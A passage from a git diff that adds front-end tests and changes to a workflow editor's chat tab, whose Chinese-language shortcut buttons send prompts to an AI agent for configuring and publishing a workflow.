+        'detail.chat.welcome.editNodeDesc': '调整节点代码和连接',
+        'detail.chat.welcome.editNodePrompt': '用户点击了「编辑节点实现」按钮。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}。',
+        'detail.chat.welcome.editFlowShort': '调整流程结构',
+        'detail.chat.welcome.editFlowDesc': '调整节点和边',
+        'detail.chat.welcome.editFlowPrompt': '用户点击了「调整流程结构」按钮。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}。',
+        'detail.chat.welcome.editRegenerateShort': '生成工作流',
+        'detail.chat.welcome.editRegenerateDesc': '基于 workflow.md 生成 workflow.json',
+        'detail.chat.welcome.editRegeneratePrompt': '用户点击了「生成工作流」按钮。基于 workflow.md 生成 workflow.json。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}。',
+        'detail.chat.welcome.canHelp': '我可以帮你：',
+        'detail.chat.welcome.bullet1': '修改节点',
+        'detail.chat.welcome.bullet2': '调整流转',
+        'detail.chat.welcome.bullet3': '新增节点',
+        'detail.chat.welcome.bullet4': '重构结构',
+        'detail.chat.welcome.tipPart1': '先看左侧',
+        'detail.chat.welcome.tipPart2': '。',
+        'detail.chat.welcome.retry': '重试',
+        'detail.chat.welcome.guideExpand': '展开',
+        'detail.chat.welcome.guideCollapse': '收起',
+        'detail.chat.welcome.guidePrimaryShort': '帮我智能配置',
+        'detail.chat.welcome.guidePrimaryDesc': '配置工作流',
+        'detail.chat.welcome.guidePrompt': '用户点击了「帮我智能配置」按钮。请从 {{guidePath}} 获取工作流有哪些配置，包括发布配置、工作流执行配置等。工作流 ID 是 {{id}}，工作流目录是 {{dir}}。配置模板接口是 GET/PUT {{configEndpoint}}，兜底迁移接口是 {{configSyncEndpoint}}。前端当前 API 清单：{{apiEndpoints}}。config.json 和 workflow.json 只能作为迁移兜底；后端接口不可用时必须停止配置流程。',
+        'detail.chat.welcome.guideInputModeShort': '配置输入方式',
+        'detail.chat.welcome.guideInputModeDesc': '选择 API、Syslog 或其它输入',
+        'detail.chat.welcome.guideInputModeInstruction': '不要要求 guide.md 存在按钮表；请围绕输入模式自动提取引导信息并发一个 question 卡片。',
+        'detail.chat.welcome.guideSourceShapeShort': '确认来源数据',
+        'detail.chat.welcome.guideSourceShapeDesc': '确认来源产品和数据格式',
+        'detail.chat.welcome.guideSourceShapeInstruction': '请围绕来源形态发一个 question 卡片。',
+        'detail.chat.welcome.guideOutputShort': '设置输出去向',
+        'detail.chat.welcome.guideOutputDesc': '确认输出位置',
+        'detail.chat.welcome.guideOutputInstruction': '请围绕输出去向发一个 question 卡片。',
+        'detail.chat.welcome.guideFilterShort': '调整过滤规则',
+        'detail.chat.welcome.guideFilterDesc': '确认过滤和去重规则',
+        'detail.chat.welcome.guideFilterInstruction': '请围绕过滤规则发一个 question 卡片。',
+        'detail.chat.welcome.guideApplyShort': '应用配置方案',
+        'detail.chat.welcome.guideApplyDesc': '确认应用或保存草稿',
+        'detail.chat.welcome.guideApplyInstruction': '请围绕应用方式发一个 question 卡片。',
+        'detail.chat.welcome.guideSampleInstruction': '请围绕样例验证发一个 question 卡片。',
+        'detail.chat.welcome.guideQuestionPrompt': '用户点击了「{{focus}}」按钮。这个按钮的意图是：{{instruction}} 第一步必须读取 {{guidePath}}，不要要求 guide.md 存在按钮表，请从全文自动提取相关引导信息。工作流 ID 是 {{id}}，工作流目录是 {{dir}}。配置模板接口是 GET/PUT {{configEndpoint}}，兜底迁移接口是 {{configSyncEndpoint}}。前端当前 API 清单：{{apiEndpoints}}。config.json 和 workflow.json 不能直接写。后端接口不可用时必须停止配置流程，不要追问用户要对 workflow.json 模板触发器做什么。必须调用 question 工具，并提供自定义输入，没有则填 none。',
+        'detail.chat.welcome.guideAuditShort': '检查当前配置',
+        'detail.chat.welcome.guideAuditDesc': '检查缺失项',
+        'detail.chat.welcome.auditPrompt': '请先读取 {{guidePath}} 后检查配置。工作流 ID 是 {{id}}，工作流目录是 {{dir}}。',
+        'detail.chat.welcome.guideSampleShort': '验证样例数据',
+        'detail.chat.welcome.guideSampleDesc': '验证输入输出',
+        'detail.chat.welcome.samplePrompt': '请先读取 {{guidePath}} 后验证样例。工作流 ID 是 {{id}}，工作流目录是 {{dir}}。',
+        'detail.run.guideApiShort': '发布为 API',
+        'detail.run.guideApiDesc': '配置 API 发布',
+        'detail.run.guideApiInstruction': '围绕 API 发布读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideSyslogShort': 'Syslog 接入',
+        'detail.run.guideSyslogDesc': '配置 Syslog 接入',
+        'detail.run.guideSyslogInstruction': '围绕 Syslog 接入读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideKafkaShort': 'Kafka 接入',
+        'detail.run.guideKafkaDesc': '配置 Kafka 接入',
+        'detail.run.guideKafkaInstruction': '围绕 Kafka 接入读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideWebhookShort': 'Webhook 接入',
+        'detail.run.guideWebhookDesc': '配置 Webhook 接入',
+        'detail.run.guideWebhookInstruction': '围绕 Webhook 接入读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+        'detail.run.guideScheduleShort': '定时触发',
+        'detail.run.guideScheduleDesc': '配置定时触发',
+        'detail.run.guideScheduleInstruction': '围绕定时触发读取 guide.md，先 GET {{configEndpoint}}，确认后 PUT {{configEndpoint}}，config.json 和 workflow.json 不是直接写入目标；后端接口不可用时必须停止配置流程',
+      };
+      return (translations[key] ?? key).replace(/{{(\w+)}}/g, (_match, name: string) => (
+        params?.[name] === undefined ? '' : String(params[name])
+      ));
+    },
+    i18n: { language: 'zh-CN' },
+  }),
+}));
+
+const workflow = { // Workflow fixture used as the default prop: global source, empty markdown, no nodes or edges, zeroed stats.
+  id: 'stream_alert_denoise',
+  name: 'Stream Alert Denoise',
+  category: 'default',
+  source: 'global' as const,
+  status: 'active' as const,
+  createdAt: 0,
+  updatedAt: 0,
+  markdownContent: '',
+  workflowJson: {
+    start: 'receive_alert',
+    nodes: [],
+    edges: [],
+  },
+  stats: {
+    callCount: 0,
+    successCount: 0,
+    errorCount: 0,
+    totalRuntime: 0,
+    avgRuntime: 0,
+    thumbsUp: 0,
+    thumbsDown: 0,
+  },
+};
+
+function renderChatTab(props: Partial<ComponentProps<typeof ChatTab>> = {}) {
+  // Mounts ChatTab under a MemoryRouter. The shared `workflow` fixture is the
+  // default; any key in `props` (including `workflow`) takes precedence.
+  const chatTab = <ChatTab workflow={workflow} {...props} />;
+
+  return render(<MemoryRouter>{chatTab}</MemoryRouter>);
+}
+
+describe('WorkflowDetail ChatTab', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    capturedSessionChatProps.length = 0;
+    capturedSessionOptions.length = 0;
+    localStorage.clear();
+    mockClientGet.mockResolvedValue({ data: {} });
+    mockCreateAndSend.mockResolvedValue(undefined);
+    mockUseAgents.mockReturnValue({
+      agents: [
+        {
+          name: 'rex',
+          description: 'Rex',
+          mode: 'primary',
+          native: true,
+          permission: [],
+          options: {},
+          skills: [],
+          tools: [],
+        },
+        {
+          name: 'explore',
+          description: 'Explore',
+          mode: 'subagent',
+          native: true,
+          permission: [],
+          options: {},
+          skills: [],
+          tools: [],
+        },
+      ],
+      loading: false,
+      error: null,
+      refetch: vi.fn(),
+    });
+    mockUseProviders.mockReturnValue({
+      providers: [],
+      connectedIds: [],
+      loading: false,
+      error: null,
+      refetch: vi.fn(),
+    });
+    mockDefaultModelGetResolved.mockResolvedValue({ data: { provider_id: '', model_id: '' } });
+    mockModelListDefinitions.mockResolvedValue({ data: { models: [] } });
+  });
+
+  it('passes the explicit workflow id into the AI session context', () => {
+    renderChatTab();
+    const { contextMessage } = capturedSessionOptions[0]; // options of the first useSessionChat call
+    expect(contextMessage).toContain('工作流 ID： stream_alert_denoise');
+    expect(contextMessage).toContain('工作流目录： ~/.flocks/plugins/workflows/stream_alert_denoise/');
+    expect(contextMessage).toContain('workflow.md');
+    expect(contextMessage).toContain('guide.md');
+    expect(contextMessage).not.toContain('workflow.edit.md');
+    expect(contextMessage).toContain('workflow-config-guide');
+    expect(contextMessage).toContain('前端当前 API 清单');
+    expect(contextMessage).toContain('GET /api/workflow/stream_alert_denoise/service');
+    expect(contextMessage).toContain('DELETE /api/workflow/stream_alert_denoise/triggers/{triggerId}');
+    expect(contextMessage).toContain('server_api_token');
+    expect(contextMessage).toContain('Authorization: Bearer');
+  });
+
+  it('includes the workflow id in workflow configuration shortcut prompts', async () => {
+    const user = userEvent.setup();
+    renderChatTab();
+
+    await user.click(screen.getByRole('button', { name: /帮我智能配置/ }));
+
+    await waitFor(() => {
+      expect(mockCreateAndSend).toHaveBeenCalledWith(
+        expect.objectContaining({
+          text: expect.stringContaining('工作流 ID 是 stream_alert_denoise'),
+          displayText: '@@flocks-instruction:帮我智能配置',
+        }),
+      );
+    });
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('~/.flocks/plugins/workflows/stream_alert_denoise/'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('~/.flocks/plugins/workflows/stream_alert_denoise/guide.md'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('用户点击了「帮我智能配置」按钮'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('发布配置、工作流执行配置'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('/api/workflow/stream_alert_denoise/config'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('server_api_token'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('Authorization: Bearer'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('GET /api/workflow/stream_alert_denoise/service'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('DELETE /api/workflow/stream_alert_denoise/triggers/{triggerId}'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('config.json 和 workflow.json 只能作为迁移兜底'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('后端接口不可用时必须停止配置流程'),
+      }),
+    );
+  });
+
+  it('offers focused workflow configuration questions as guide shortcuts', async () => {
+    const user = userEvent.setup();
+    renderChatTab();
+
+    expect(screen.getByRole('button', { name: /配置输入方式/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /确认来源数据/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /设置输出去向/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /调整过滤规则/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /应用配置方案/ })).toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: /配置输入方式/ }));
+
+    await waitFor(() => {
+      expect(mockCreateAndSend).toHaveBeenCalledWith(
+        expect.objectContaining({
+          text: expect.stringContaining('第一步必须读取 ~/.flocks/plugins/workflows/stream_alert_denoise/guide.md'),
+          displayText: '@@flocks-instruction:配置输入方式',
+        }),
+      );
+    });
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('用户点击了「配置输入方式」按钮'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('不要要求 guide.md 存在按钮表'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('必须调用 question 工具'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('server_api_token'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('config.json 和 workflow.json 不能直接写'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('不要追问用户要对 workflow.json 模板触发器做什么'),
+      }),
+    );
+  });
+
+  it('offers workflow editing guides in the empty workbench', async () => {
+    const user = userEvent.setup();
+    renderChatTab();
+
+    expect(screen.getByText('Rex 辅助修改')).toBeInTheDocument();
+    expect(screen.getByText('辅助修改')).toBeInTheDocument();
+    expect(screen.getByText('辅助配置')).toBeInTheDocument();
+    expect(screen.getByText('辅助发布')).toBeInTheDocument();
+    expect(screen.getByTestId('workflow-edit-guide-scroll')).toHaveClass('overflow-y-auto');
+    expect(screen.getByRole('button', { name: /修改功能需求/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /修改节点功能/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /编辑节点实现/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /调整流程结构/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /生成工作流/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /发布为 API/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /Syslog 接入/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /Kafka 接入/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /Webhook 接入/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /定时触发/ })).toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: /修改节点功能/ }));
+
+    await waitFor(() => {
+      expect(mockCreateAndSend).toHaveBeenCalledWith(
+        expect.objectContaining({
+          text: expect.stringContaining('用户点击了「修改节点功能」按钮'),
+          displayText: '@@flocks-instruction:修改节点功能',
+        }),
+      );
+    });
+  });
+
+  it('offers publish guide shortcuts from the workflow workbench', async () => {
+    const user = userEvent.setup();
+    renderChatTab();
+
+    await user.click(screen.getByRole('button', { name: /发布为 API/ }));
+
+    await waitFor(() => {
+      expect(mockCreateAndSend).toHaveBeenCalledWith(
+        expect.objectContaining({
+          text: expect.stringContaining('用户点击了「发布为 API」按钮'),
+          displayText: '@@flocks-instruction:发布为 API',
+        }),
+      );
+    });
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('围绕 API 发布读取 guide.md'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('/api/workflow/stream_alert_denoise/config'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('Authorization: Bearer'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('POST /api/workflow/stream_alert_denoise/publish'),
+      }),
+    );
+    expect(mockCreateAndSend).toHaveBeenCalledWith(
+      expect.objectContaining({
+        text: expect.stringContaining('后端接口不可用时必须停止配置流程'),
+      }),
+    );
+  });
+
+  it('routes launch requests through the current chat instead of directly creating a new session', async () => {
+    const onLaunchRequestHandled = vi.fn();
+    setStoredSessions(workflow.id, [
+      { id: 'existing-workflow-session', title: 'Existing', createdAt: Date.now() },
+    ]);
+
+    renderChatTab({
+      launchRequest: {
+        id: 1,
+        prompt: '请引导我配置 API 发布。',
+        displayLabel: '发布为 API',
+      },
+      onLaunchRequestHandled,
+    });
+
+    await waitFor(() => {
+      expect(capturedSessionChatProps[capturedSessionChatProps.length - 1]?.sessionId).toBe('existing-workflow-session');
+      expect(mockSendPrompt).toHaveBeenCalledWith(
+        '请引导我配置 API 发布。',
+        expect.objectContaining({
+          displayText: '@@flocks-instruction:发布为 API',
+        }),
+      );
+    });
+    expect(mockClientGet).toHaveBeenCalledWith('/api/session/existing-workflow-session');
+    expect(mockReset).not.toHaveBeenCalled();
+    expect(mockCreateAndSend).not.toHaveBeenCalled();
+    expect(onLaunchRequestHandled).toHaveBeenCalledWith(1);
+  });
+
+  it('shows Rex as a read-only workflow chat agent', () => {
+    renderChatTab();
+    const { agentName, mentionAgents, display } = capturedSessionChatProps[0]; // props of the first SessionChat render
+    expect(agentName).toBe('rex');
+    expect(mentionAgents.map((agent: any) => agent.name)).toEqual(['rex']);
+    expect(display).toEqual({
+      collapseIntermediateSteps: true,
+      processGroupsDefaultOpen: false,
+    });
+    expect(screen.getAllByText(/Rex/i).length).toBeGreaterThan(0);
+    expect(screen.queryByRole('button', { name: /Rex/i })).not.toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: /Explore/i })).not.toBeInTheDocument();
+  });
+
+  it('keeps the workflow composer compact enough for guide shortcuts above it', () => {
+    renderChatTab();
+    const { composerTextareaMinHeight, composerTextareaMaxHeight } = capturedSessionChatProps[0];
+    expect(composerTextareaMinHeight).toBe(48);
+    expect(composerTextareaMaxHeight).toBe(120);
+  });
+
+  it('keeps workflow guide descriptions behind info tooltips', async () => {
+    const user = userEvent.setup();
+    renderChatTab();
+
+    expect(screen.getByRole('button', { name: /帮我智能配置/ })).toBeInTheDocument();
+    expect(screen.queryByText('配置工作流')).not.toBeInTheDocument();
+
+    const infoIcon = screen.getAllByRole('img', { name: '帮我智能配置说明' })[0];
+    await user.hover(infoIcon);
+
+    expect(await screen.findByText('配置工作流')).toBeInTheDocument();
+
+    await user.unhover(infoIcon);
+    await waitFor(() => {
+      expect(screen.queryByText('配置工作流')).not.toBeInTheDocument();
+    });
+  });
+
+  it('refreshes after a tool finishes when workflow.md content changed without updatedAt changing', async () => {
+    const updatedWorkflow = {
+      ...workflow,
+      updatedAt: workflow.updatedAt,
+      markdownContent: '# AI edited markdown\n',
+    };
+    vi.mocked(workflowAPI.get).mockResolvedValueOnce({ data: updatedWorkflow } as any);
+    const onWorkflowUpdated = vi.fn();
+
+    renderChatTab({
+      workflow: { ...workflow, markdownContent: '# old markdown\n' },
+      onWorkflowUpdated,
+    });
+
+    capturedSessionChatProps[0].onSSEEvent({
+      type: 'message.part.updated',
+      properties: {
+        part: {
+          type: 'tool',
+          tool: 'apply_patch',
+          state: { status: 'completed' },
+        },
+      },
+    });
+
+    await waitFor(() => {
+      expect(workflowAPI.get).toHaveBeenCalledWith('stream_alert_denoise');
+      expect(onWorkflowUpdated).toHaveBeenCalledWith(updatedWorkflow);
+    });
+  });
+});
diff --git a/webui/src/pages/WorkflowDetail/tabs/ChatTab.tsx b/webui/src/pages/WorkflowDetail/tabs/ChatTab.tsx
index 8926b6c79..fec66f1ea 100644
--- a/webui/src/pages/WorkflowDetail/tabs/ChatTab.tsx
+++ b/webui/src/pages/WorkflowDetail/tabs/ChatTab.tsx
@@ -1,12 +1,26 @@
 import { useState, useEffect, useRef, useCallback } from 'react';
 import { useTranslation } from 'react-i18next';
-import { AlertCircle, FolderOpen, Plus, Clock } from 'lucide-react';
-import SessionChat, { NodeRef, type SSEChatEvent } from '@/components/common/SessionChat';
+import { AlertCircle, Bot, Clock, Plus } from 'lucide-react';
+import SessionChat, {
+  NodeRef,
+  buildInstructionDisplayText,
+  type PromptDisplayOptions,
+  type SSEChatEvent,
+} from '@/components/common/SessionChat';
+import {
+  ChatAgentDisplay,
+  ChatModelPicker,
+  useChatAgentOptions,
+  useChatModelOptions,
+} from '@/components/common/ChatPromptSelectors';
+import ChatGuideDock, { type ChatGuideAction } from '@/components/common/ChatGuideDock';
+import GuideInfoIcon from '@/components/common/GuideInfoIcon';
 import { useSessionChat } from '@/hooks/useSessionChat';
 import { useDefaultModelVision } from '@/hooks/useDefaultModelVision';
 import type { ImagePartData } from '@/utils/imageUpload';
-import { workflowAPI, Workflow, WorkflowExecution, WorkflowNode } from '@/api/workflow';
+import { workflowAPI, workflowAPIEndpoints, Workflow, WorkflowExecution, WorkflowNode } from '@/api/workflow';
 import { formatSessionDate } from '@/utils/time';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 import client from '@/api/client';
 import {
   getStoredSessions,
@@ -16,17 +30,57 @@ import {
 } from '../sessionStorage';
 
 const FALLBACK_POLL_MS = 30_000;
+const WORKFLOW_CONFIG_SKILL_NAME = 'workflow-config-guide'; // exposed to prompt templates as `configSkillName`
+const WORKFLOW_CHAT_AGENT_NAME = 'rex';
+const WORKFLOW_CHAT_AGENT_NAMES = [WORKFLOW_CHAT_AGENT_NAME]; // allow-list handed to useChatAgentOptions
+const WORKFLOW_GUIDE_FILE_NAME = 'guide.md'; // joined onto the workflow directory to form the guide path
+
+function formatWorkflowAPIEndpoints(id: string): string {
+  return JSON.stringify(workflowAPIEndpoints(id), null, 2); // endpoint catalog for `id` as 2-space-indented JSON text
+}
+
+type TranslateFn = (key: string, params?: Record<string, unknown>) => string; // minimal signature of the i18n `t` function that withBackendConfigAccessGuide accepts
+
+function workflowRevisionKey(workflow: Workflow): string {
+  // Identifies a workflow revision by its updatedAt stamp, its markdown text
+  // (markdownContent, else editMarkdownContent, else '') and its serialized workflowJson.
+  const markdown = workflow.markdownContent ?? workflow.editMarkdownContent ?? '';
+  const serializedGraph = JSON.stringify(workflow.workflowJson);
+  return [workflow.updatedAt, markdown, serializedGraph].join('\u0000');
+}
+
+type WorkflowPromptParams = Record<string, unknown> & { // template params that always include the rendered access-guide text
+  backendConfigAccessGuide: string;
+};
+
+function withBackendConfigAccessGuide(
+  t: TranslateFn,
+  params: Record<string, unknown>,
+): WorkflowPromptParams {
+  // Render the access-guide text from the same params, then return a copy of the
+  // params with it stored under `backendConfigAccessGuide` (replacing any caller value).
+  const backendConfigAccessGuide = t('detail.chat.backendConfigAccessGuide', params);
+  return { ...params, backendConfigAccessGuide };
+}
 
 // ─────────────────────────────────────────────
 // ChatTab
 // ─────────────────────────────────────────────
 
+export interface WorkflowChatLaunchRequest {
+  id: number; // request identifier; same type as the argument of ChatTabProps.onLaunchRequestHandled
+  prompt: string; // prompt text to send into the chat
+  displayLabel?: string; // optional label; presumably shown via buildInstructionDisplayText instead of the raw prompt — confirm in the launch effect
+}
+
 interface ChatTabProps {
   workflow: Workflow;
   onLatestExecutionChange?: (execution: WorkflowExecution | null) => void;
   onWorkflowUpdated?: (updated: Workflow) => void;
   onFirstMessageSent?: () => void;
   onSessionChange?: (sessionId: string | null) => void;
+  launchRequest?: WorkflowChatLaunchRequest | null; // externally requested prompt to launch; null/undefined when there is none
+  onLaunchRequestHandled?: (id: number) => void; // presumably called with launchRequest.id once that request was handled — confirm in the launch effect
   selectedNode?: WorkflowNode | null;
   onNodeRefDismiss?: () => void;
 }
@@ -37,24 +91,63 @@ export default function ChatTab({
   onWorkflowUpdated,
   onFirstMessageSent,
   onSessionChange,
+  launchRequest,
+  onLaunchRequestHandled,
   selectedNode,
   onNodeRefDismiss,
 }: ChatTabProps) {
-  const { t } = useTranslation('workflow');
-  const supportsVision = useDefaultModelVision();
+  const { t, i18n } = useTranslation('workflow');
+  const workflowDisplayName = getWorkflowDisplayName(workflow, i18n?.language);
+  const defaultSupportsVision = useDefaultModelVision();
   const [activeSessionId, setActiveSessionId] = useState<string | null>(null);
   const [initialMessage, setInitialMessage] = useState<string | null>(null);
   const [sessions, setSessions] = useState<StoredSession[]>([]);
   const [showHistory, setShowHistory] = useState(false);
+  const [sessionsHydrated, setSessionsHydrated] = useState(false);
   const hasCreatedRef = useRef(false);
-  const lastUpdatedAtRef = useRef<number>(workflow.updatedAt);
+  const workflowRevisionRef = useRef<string>(workflowRevisionKey(workflow));
   const workflowIdRef = useRef<string>(workflow.id);
   workflowIdRef.current = workflow.id;
   const historyBtnRef = useRef<HTMLDivElement>(null);
+  const { agents: workflowChatAgents } = useChatAgentOptions({
+    allowedAgentNames: WORKFLOW_CHAT_AGENT_NAMES,
+  });
+  const {
+    groupedOptions: groupedChatModelOptions,
+    loading: loadingChatModels,
+    selectedModelOption,
+    selectedPromptModel,
+    setSelectedModelKey,
+  } = useChatModelOptions();
+  const effectiveSupportsVision = selectedModelOption?.supportsVision ?? defaultSupportsVision;
+
+  useEffect(() => {
+    workflowRevisionRef.current = workflowRevisionKey(workflow);
+  }, [workflow]);
 
   const workflowDir = workflow.source === 'global'
     ? `~/.flocks/plugins/workflows/${workflow.id}/`
     : `.flocks/plugins/workflows/${workflow.id}/`;
+  const workflowMdPath = `${workflowDir}workflow.md`;
+  const workflowGuidePath = `${workflowDir}${WORKFLOW_GUIDE_FILE_NAME}`;
+  const endpoints = workflowAPIEndpoints(workflow.id);
+  const workflowConfigEndpoint = endpoints.config.read.replace(/^GET /, '');
+  const workflowChatPromptParams = withBackendConfigAccessGuide(t, {
+    id: workflow.id,
+    name: workflowDisplayName,
+    category: workflow.category,
+    dir: workflowDir,
+    mdPath: workflowMdPath,
+    jsonPath: `${workflowDir}workflow.json`,
+    guidePath: workflowGuidePath,
+    configSkillName: WORKFLOW_CONFIG_SKILL_NAME,
+    configEndpoint: workflowConfigEndpoint,
+    configSyncEndpoint: endpoints.config.syncFallback.replace(/^POST /, ''),
+    publishEndpoint: endpoints.apiService.publish.replace(/^POST /, ''),
+    unpublishEndpoint: endpoints.apiService.unpublish.replace(/^POST /, ''),
+    triggersEndpoint: endpoints.triggers.list.replace(/^GET /, ''),
+    apiEndpoints: formatWorkflowAPIEndpoints(workflow.id),
+  });
 
   const {
     sessionId: hookSessionId,
@@ -64,15 +157,12 @@ export default function ChatTab({
     createAndSend: createAndSendSession,
     reset: resetSession,
   } = useSessionChat({
-    title: t('detail.chat.sessionTitle', { name: workflow.name }),
+    title: t('detail.chat.sessionTitle', { name: workflowDisplayName }),
     category: 'workflow',
-    contextMessage: t('detail.chat.contextMessage', {
-      name: workflow.name,
-      category: workflow.category,
-      dir: workflowDir,
-      mdPath: `${workflowDir}workflow.md`,
-      jsonPath: `${workflowDir}workflow.json`,
-    }),
+    contextMessage: [
+      t('detail.chat.contextMessage', workflowChatPromptParams),
+      workflowChatPromptParams.backendConfigAccessGuide,
+    ].join('\n\n'),
   });
 
   const sessionId = activeSessionId || hookSessionId;
@@ -83,9 +173,14 @@ export default function ChatTab({
 
   // Load stored sessions and validate only the active one (lightweight check)
   useEffect(() => {
+    let cancelled = false;
+    setSessionsHydrated(false);
     const stored = getStoredSessions(workflow.id);
     if (stored.length === 0) {
       setSessions([]);
+      setActiveSessionId(null);
+      hasCreatedRef.current = false;
+      setSessionsHydrated(true);
       return;
     }
 
@@ -97,7 +192,9 @@ export default function ChatTab({
     (async () => {
       try {
         await client.get(`/api/session/${stored[0].id}`);
+        if (cancelled) return;
       } catch {
+        if (cancelled) return;
         // First session is gone — try to find a valid one
         const valid: StoredSession[] = [];
         for (const s of stored.slice(1)) {
@@ -115,8 +212,15 @@ export default function ChatTab({
           setActiveSessionId(null);
           hasCreatedRef.current = false;
         }
+      } finally {
+        if (!cancelled) {
+          setSessionsHydrated(true);
+        }
       }
     })();
+    return () => {
+      cancelled = true;
+    };
   }, [workflow.id]);
 
   // Save newly created session to localStorage
@@ -124,12 +228,12 @@ export default function ChatTab({
     if (!hookSessionId) return;
     const newSession: StoredSession = {
       id: hookSessionId,
-      title: t('detail.chat.sessionTitle', { name: workflow.name }),
+      title: t('detail.chat.sessionTitle', { name: workflowDisplayName }),
       createdAt: Date.now(),
     };
     pushStoredSession(workflow.id, newSession);
     setSessions(getStoredSessions(workflow.id));
-  }, [hookSessionId, workflow.id, workflow.name]);
+  }, [hookSessionId, workflow.id, workflowDisplayName, t]);
 
   // Close history dropdown on outside click
   useEffect(() => {
@@ -145,19 +249,34 @@ export default function ChatTab({
 
   // First message — via SessionChat's onCreateAndSend callback
   const handleCreateAndSend = useCallback(
-    async (text: string, imageParts?: ImagePartData[]) => {
+    async (
+      text: string,
+      imageParts?: ImagePartData[],
+      agentOverride?: string,
+      modelOverride?: { providerID: string; modelID: string } | null,
+      options?: PromptDisplayOptions,
+    ) => {
       const hasImages = (imageParts?.length ?? 0) > 0;
       // Allow image-only messages (no text) to flow through.
       if (hasCreatedRef.current || (!text.trim() && !hasImages)) return;
       hasCreatedRef.current = true;
       onFirstMessageSent?.();
+      const effectiveAgent = agentOverride || WORKFLOW_CHAT_AGENT_NAME;
+      const effectiveModel = modelOverride === undefined ? selectedPromptModel : modelOverride;
+      const effectiveDisplayText = options?.displayText;
 
       try {
-        if (hasImages) {
+        if (hasImages || effectiveDisplayText) {
           // initialMessage is text-only; use createAndSend so the inline
           // image parts survive into the very first prompt instead of being
           // silently dropped (the previous bug for non-Session composers).
-          await createAndSendSession({ text, imageParts });
+          await createAndSendSession({
+            text,
+            imageParts,
+            agent: effectiveAgent,
+            model: effectiveModel,
+            displayText: effectiveDisplayText,
+          });
         } else {
           setInitialMessage(text);
           await createSession();
@@ -167,7 +286,16 @@ export default function ChatTab({
         setInitialMessage(null);
       }
     },
-    [onFirstMessageSent, createSession, createAndSendSession],
+    [onFirstMessageSent, selectedPromptModel, createSession, createAndSendSession],
+  );
+
+  const handleWelcomeGuidePrompt = useCallback(
